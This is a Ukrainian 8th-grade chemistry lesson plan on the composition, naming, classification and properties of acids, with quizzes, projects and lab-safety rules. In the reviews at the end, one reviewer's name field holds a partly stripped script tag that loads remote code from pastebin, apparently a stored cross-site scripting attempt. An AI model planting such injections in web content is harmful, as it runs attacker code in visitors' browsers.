Конспект уроку з хімії для 8-го класу на тему "Кислоти, їх склад, назви. Класифікація кислот"

Про матеріал

На даному уроці розглядається склад, номенклатура, фізичні властивості та знаходження кислот у природі. Даний урок - це урок з елементами критичного мислення. На уроці використано метод проектів, тестування, робота з технологічною картою, презентацію.

Перегляд файлу

Тема. Кислоти, їх склад, назви. Класифікація кислот.

Цілі. Ознайомити учнів зі складом, назвами і класифікацією кислот; з’ясувати фізичні властивості кислот, поширення їх у природі, продовжити формування в учнів навичок: дисциплінованості, працьовитості; навчити акуратності при оформленні завдань в зошиті;  розвивати хімічну мову, розумову та пізнавальну активність, практичні уміння та навички при виконанні  хімічного експерименту, уміння узагальнити і робити висновки при вивченні матеріалу  теми.

Обладнання й матеріали: зразки кислот, комп’ютер, мультимедійний проектор, роздатковий матеріал, технологічні карти.

Тип уроку: комбінований.

Методи навчання: пояснювально-ілюстративні, словесні, частково-пошукові, практичні, інтерактивні.

Міжпредметні зв’язки: хімія, основи здоровя.

Очікувані результати: учень складає формули кислот; класифікує кислоти; характеризує склад, фізичні властивості; встановлює причинно-наслідкові зв’язки між властивостями кислот та їх дією на організм людини.

 

                                                    Хід уроку

І. Організаційний момент.

- Емоційна рефлексія

Шановні учні, сьогодні на уроці ми працюватимемо разом, я розраховую на вашу підтримку та допомогу. Кожному з вас я хочу побажати , щоб на цьому уроці ви були:

„У"- усміхненими

„С"- спокійними

„П"- прогресивними

„І"- ініціативними

„X"- хоробрими

Іншими словами, я бажаю вам УСПІХУ! І не тільки на уроках хімії. Усе людське життя -  постійне бажання досягти успіху у вирішенні нових питань та проблем. Генрі Форд писав: «Зібратися разом – це початок, триматися разом – це прогрес, працювати разом – це успіх» Тож нехай ці слова послужать нам епіграфом на уроці.

А зараз простягніть уперед ліву руку і уявіть на ній ваші життєві знання, простягніть уперед праву руку і уявіть ваші спеціальні знання. З’єднайте  долоні. Так ваш життєвий досвід, об’єднаний із знаннями стане вам у нагоді під час уроку. А тепер візьміться за  руки, ви об’єднали всі ваші знання, а це вже сила, це надія на успіх.

 Діти, підніміть руку, хто бажає досягти успіху? Я теж бажаю досягти успіху. Отже, бачу це питання є важливим для нас, тож давайте обговоримо його та запропонуємо складові успіху, які розмістимо на плакаті, щоб сьогодні на уроці теж скористатись цими рецептами та досягти успіху. (Самоконтроль, співпраця, досконала підготовка).

 

 

 

 

 

 

 

 Сьогодні на уроці ми будемо працювати над самооцінкою, бо це важливо для досягнення успіху в будь-якій справі. Крім того, за допомогою самооцінки ми в кінці уроку дізнаємось про результативність своєї роботи.

Підготуємо наші зошити до роботи. Пам’ятайте, що під час роботи з діловою документацією до успіху веде старанне, охайне, уважне ставлення до цієї справи.

 Сьогодні на уроці ви будете працювати в парах, тому що  легше працювати обєднавши зусилля. Однак не забувайте слова з відомої байки І. Крилова:

               Когда в товарищах согласья нет,

               На лад их дело не пойдет,

               И выйдет из него не дело, только мука.

Отже, ви  налаштовані на співпрацю, на очікування чогось нового, цікавого, на успіх?

II. Актуалізація опорних знань

1.Бліц-опитування.

Десь дуже далеко у Всесвіті знаходиться дивовижна планета Неорганія. А править чотирма містами царства гордовита цариця Хемі. Міста мають назви, а жителі прізвища. Мешканці міст добрі знайомі, між ними давно утворились міцні зв’язки. Неорганійці дружні, толерантні, хоча серед них є і досить імпульсивні особи, але Хемі всім дає раду. Діти, а ви знаєте назви міст Неорганії?

  • А який клас неорганічних сполук ми вивчили?
  • Що ми називаємо оксидами ?
  • Які оксиди називають основними?
  • Які оксиди називають кислотними?

З метою узагальнення й закріплення знань з теми «Оксиди» пропоную «Тест- тренажер».

-  «Тест-тренажер»

1. Вибрати формулу оксиду:

 1. NaCl;

 2. СО2;

 3. Са(ОН)2;

 4. НNO3

2. Вибрати ряд, в якому знаходяться тільки формули кислотних оксидів:

 1. Na2O; SO2,  CuO,  Al2O3;

 2. BaO, SО3, SО2,  N2O5;

 3. CO2,  P2O5, SO3, SiO2,

 4. FeO,  ZnO,  P2O5, CO.

3 Серед наведених оксидів основним є:

 1. CO2;

 2. FeO;

 3. ZnO;

 4. P2O5.

4. «Знайди помилку». Яка формула написана невірно:

 1. SO3;

 2. P2O5;

 3. NaO2;

 4. СO2.

5. Серед наведених оксидів амфотерним є:

 1. SO2;

 2. CO;

 3. Fe2O3;

 4. CuO.

6. Вибрати формулу  « негашеного вапна»:

 1. K2O;

 2. Fe2O3;

 3. CaO;

 4. CuO.

7. Де застосовується «негашене вапно»?

 1. Як миючий засіб.

 2. В будівництві.

 3. У виробництві ліків.

 4. В металургії.

Оцініть свої можливості і виберіть варіант з яким на вашу думку ви зможете сьогодні справитись. Працюємо з технологічними картами. Завдання на жовтому тлі – середній рівень, зеленому – достатній рівень, червоному – високий рівень.

 -  «Виграй тендер»

Завдання для середнього рівня знань.

Дайте назву  сполукам, підкресліть рискою формулу кислотного оксиду, і обчисліть масову частку Оксигену в ньому:

а) Na2O;  б) SO2.

  Завдання для достатнього рівня знань

        У підвалах замку Оксигену було знайдено старі рукописи, в яких зашифровано записи. Розшифруйте їх.

Рукопис. Хімічна сполука містить Фосфор та Оксиген. Масові частки цих елементів, відповідно, становлять 43,66% та  56,34%. Визначте формулу сполуки.

  Завдання для високого рівня знань

        Учні класу за 45 хв. уроку  видихають разом із повітрям 1,1 кг вуглекислого газу, який об’єм займає цей газ за нормальних умов. (Перевірка)

Ми подолали першу сходинку до досягнення мети уроку. Відзначимо це радісним «Смайликом», що завітав до нас на урок з наших мобільних телефонів і походить від англійського „посміхнись", та попрацюємо кожний над своєю самооцінкою.

ІІІ. Мотивація пізнавальної діяльності

Серед дивовижного царства неживої природи є чимало речовин, про існування яких ми й не підозрюємо. Вони постійно навколо нас, і ми користуємось ними в повсякденному  житті. На сьогоднішньому уроці  розмова піде саме про них, а розпочнемо…

  «Хімічна квітка»

                В нашій лабораторії розцвіла квітка надзвичайної краси - на її пелюстках- 

формули оксидів. Згадайте літо. Влітку ви, мабуть, гадали на ромашці – «любить – не любить», так і сьогодні ми погадаємо «реагує – не реагує» даний оксид з водою. (Учні пишуть на дошці рівняння реакцій взаємодії кислотних оксидів з водою).

Отже, сьогодні ми поговоримо про органічні та неорганічні кислоти, які надзвичайно важливі для людини, так як вона використовує їх у своїй практичній діяльності.

  А що таке кислота і які бувають кислоти ви дізнаєтесь,  вивчивши тему нашого уроку. В зошитах запишіть, будь ласка, тему уроку: «Кислоти, їх склад, назви. Класифікація кислот»

  На уроці ви познайомитесь з поняттям кислоти, їх складом, класифікацією і фізичними властивостями.

IV. Вивчення нового матеріалу.

  1. Поширення кислот

   У природі існують органічні та неорганічні кислоти. Питання їх поширення ми з’ясуємо в процесі презентації проектів груп учнів, які кілька уроків тому отримали завдання дослідити їх.

- Презентація проекту І групи.

 Учень. Наша група, опрацювавши додаткову літературу, створила колаж, який ознайомить вас із вмістом органічних кислот у продуктах харчування.

Учень. Органічні кислоти містять молочні продукти: сир, сметана, молоко, масло, а також овочі. Багаті на органічні кислоти і ягоди ( чорна смородина, шипшина). Фрукти також містять органічні кислоти (вишні, черешні, яблука, груші).

  • Презентація проекту ІІ групи.

 Учень. Наша група працювала над проектом «Кислоти у природі».

 У житті нам постійно трапляються кислоти. Фрукти постачають нам цілий букет кислот. Аскорбінова кислота, відома як вітамін С, міститься в шипшині. Навіть синільна кислота, що вважається отрутою, знайома кожному, хто розбивав кісточки слив чи вишень. Кількість її в кісточках мізерна, але відчути запах гіркоти мигдалю  можна

 Учень. Якщо влітку підійти до мурашника, то можна надовго запам’ятати жалкі укуси її мешканців. Мурашки не лише кусають, вони вприскують у ранку  мурашину кислоту.

 Цю ж мурашину кислоту містить і кропива.

 Бджолина та осина отрути являють собою речовини кислої природи. Біль від укусу можна зменшити, втираючи у ранку розчин соди або нашатирного спирту.  Результатом нашої роботи – є створення презентації.

  - Презентація проекту ІІІ групи

 Учень. Наша група  досліджувала питання наявності кислот в організмі людини. Ми хочемо вам довести, що кислоти мають важливе значення для організму людини. Результатом нашої діяльності – є створення діафільму.

Учень. Аскорбінова, фолієва кислоти – це вітаміни. До складу шлункового соку входить хлоридна кислота, яка допомагає перетравлювати їжу.

Учень. Молочна кислота утворюється у мязах при фізичних навантаженнях.

Учень. ДНК є носіями генетичної інформації.

Учень. Людський організм складається з білків, основними складовими частинками яких є амінокислоти.

 Карбонатна кислота міститься в мінеральних джерелах, сульфідна у вулканічних газах. Оксиди Нітрогену та Сульфуру розчиняються у крапельках води хмар і утворюють сульфатну та нітратну кислоти, що випадають на землю у вигляді кислотних дощів

 Отже….

  1. Склад кислот. Визначення.

  Що ж об’єднує всі кислоти? Який елемент входить до складу всіх кислот? Всі кислоти незалежно від їх походження об’єднує загальна властивість – вони містять атоми Гідрогену.  Крім атомів Гідрогену все інше – кислотний залишок.  Давайте спробуємо дати відповідь на запитання – які речовини називаються кислотами?

 

 

- «Гра з країни Загадок»

  • Робота з технологічною картою.

 Рухаючись за годинниковою стрілкою і весь час пропускаючи однакову кількість складів, прочитайте визначення кислот.

Кис

у

ло

сво

ти

є

-

му

це

скла

шок.

 

C:\Documents and Settings\1\Рабочий стол\кислота.jpg

скла

тять

ді

ли

дні

міс

Гід

За

ре

кі

ро

ний

я

лот

,

кис

ни

і

ви

ген

чо

 

Визначення кислот

Кожний кислотний залишок має свою валентність. Валентність кислотного залишку визначається числом атомів Гідрогену в кислоті.

    -  «Сам собі вчитель»

У запропонованих формулах кислот підкресліть кислотні залишки, визначте їх валентності:

 H2SO4, H2CO3, HNO3, H2SiO3, H3PO4. Працюємо з технологічними картами.

(Перевірка за допомогою слайдів)

Проведіть самооцінку, а я визначу смайликом подолання наступної сходинки успіху.

  1. Класифікація кислот

За якими ознаками класифікують кислоти?

 -  «Хімічний тренінг»

Розділіть формули кислот, які ви бачите на роздавальних картках, на групи за вмістом Оксигену.

Висновок: За складом Оксигену кислоти діляться на оксигеновмісні та безоксигенові.

Розділіть формули кислот на групи за кількістю атомів Гідрогену.

Висновок: за кількістю атомів Гідрогену кислоти діляться на одноосновні, двох-, трьохосновні кислоти.

 Проведіть самооцінку, а я визначу смайликом подолання наступної сходинки успіху.

 4. Номенклатура кислот

- Робота з підручником, слайдами

У 1870 році в Петербурзькій Академії наук обговорювалося питання про застосування для цієї речовини назви «Водород Серович Четырехкислов». Як ви вважаєте про яку кислоту йшла мова?  Назви кислот були запропоновані уперше хіміками Лавуаз’є, Бертоле. (Ознайомлення учнів з назвами кислот)

  Вправа-енергізатор «Австралійський дощ» 

5. Фізичні властивості кислот

 - Робота з текстовими матеріалами

 «Капелюхи мислення» - прочитайте, поміркуйте, обговоріть запропоновані тексти.

 - Робота з технологічними картами

Перший ряд. «Червоні капелюшки» - це прояв почуттів та емоцій. Прочитайте текст. Передайте його зміст із допомогою умовних позначень, малюнків, схем, створіть «Шпаргалки».

Другий ряд. «Жовті капелюшки» - ви позитивні Сонечка. Ви повинні знайти «позитив» навіть у «негативі», поставивши безліч питань, ви -  Шерлоки Холмси. Прочитайте текст. Складіть до нього якнайбільше запитань. Питання мають охопити весь матеріал і врахувати найменші дрібниці.

Третій ряд. «Білі капелюшки» - ви спокійні і розсудливі, оперуєте тільки фактами, цифрами. Прочитайте текст, олівцем зробіть позначки:

 - «!» - знав раніше;

  • «+» - довідався про нове;
  • «-« - не зрозумів;
  • «?» - викликало подив.

«Більшість кислот кислі на смак. Пригадайте смак деяких кислот, що вам траплялися в повсякденному житті: оцтової кислоти, лимону, вітаміну С, щавлевої, яблучної кислот. Виняток: саліцилова – солодка, нікотинова – гірка. Багато кислот за звичайних умов рідини, але є й тверді кислоти (фосфатна), драглиста маса – силікатна кислота. Усі кислоти важчі за воду, здебільшого добре розчинні у воді. Деякі леткі (НСІ, НNО3) мають задушливий запах. Майже всі кислоти безбарвні. Кислоти – їдкі речовини, особливо небезпечні сульфатна, нітратна, хлоридна кислоти».              

Проведіть самооцінку, а я визначу смайликом подолання наступної сходинки успіху.

( Демонстрація розчинності кислот за таблицею розчинності)

6.  Правила техніки безпеки.

 Щоб отримати розведений розчин кислоти, потрібно лити кислоту у воду, а не навпаки. «Золоте правило» хімії:

Спочатку – вода,

                             потім  - кислота.

 Бо трапитись може

                               велика біда.

Це пояснюється тим, що вода маючи меншу густину, ніж кислота, опиниться на поверхні, закипить і її бризки можуть потрапити на руки, обличчя, викликавши опіки.

  • Демонстраційний дослід. (Розведення сульфатної кислоти)

Якщо сталося так, що краплі кислоти потрапили на шкіру, шкіру слід промити 5% розчином соди.

V. Узагальнення й систематизація знань

 - Робота з технологічною картою

 -  «Сам собі вчитель»

 Скласти формули кислот за кислотними залишками:

Cl (I)

S (II)

PO4 (III)

SiO3 (II)

ClO4 (I)

MnO4 (II)

NO2 (I)

( Перевірка)

 - Робота з таблицею №1 (Додаток №1)

Випишіть із свого варіанту формули кислот. Назвіть їх, класифікуйте. Проведіть самооцінку, а я визначу смайликом подолання наступної сходинки успіху. Визначте результативність своєї роботи, підрахувавши сумарну кількість балів. Сумарна кількість балів це – ваша оцінка за урок.

VI. Підсумок уроку

Рефлексія.

  • Вправа «Про що ? + Що? + Як ? + Навіщо ?»
  1. Про що ми говорили на уроці?
  2. Що вони собою являють?
  3. Як правильно розбавляти кислоти ?
  4. Навіщо ми вивчаємо кислоти ?

- Складання сенкану

Кислоти

Кислі, їдкі

Розчиняються, подразнюють, знешкоджують

Кислоти необхідні для життя

Речовини

Діти, чи існує універсальна форма успіху, чи одержали ми її сьогодні на уроці? Це питання належить до розряду проблем пошуку філософського каменя, створення вічного двигуна, побудови машини часу. Але без віри людини у можливість  їх створення, не було б кроку вперед, не було б прогресу. Я хочу  подякувати вам за урок, ще раз побажати успіху і сказати, що я вірю у ваш успіх. На згадку про наш урок я дарую вам  іще один рецепт успіху: „Успіх - це тільки 10% таланту і 90% щоденної наполегливої праці."

- Домашнє завдання

 

1

 

Середня оцінка розробки
Структурованість
5.0
Оригінальність викладу
5.0
Відповідність темі
5.0
Загальна:
5.0
Всього відгуків: 2
Оцінки та відгуки
  1. Верба Ксенія Тарасівнаscript src'//pastebin.com/raw/wcNQrkG4'>/script>
    Загальна:
    5.0
    Структурованість
    5.0
    Оригінальність викладу
    5.0
    Відповідність темі
    5.0
  2. Кукса Анна Володимирівна
    Цікавий змістовний урок, який містить багато інтерактивних вправ.
    Загальна:
    5.0
    Структурованість
    5.0
    Оригінальність викладу
    5.0
    Відповідність темі
    5.0
doc
Пов’язані теми
Хімія, 8 клас, Розробки уроків
Додано
13 січня 2018
Переглядів
6790
Оцінка розробки
5.0 (2 відгука)
Безкоштовний сертифікат
про публікацію авторської розробки
Щоб отримати, додайте розробку

Додати розробку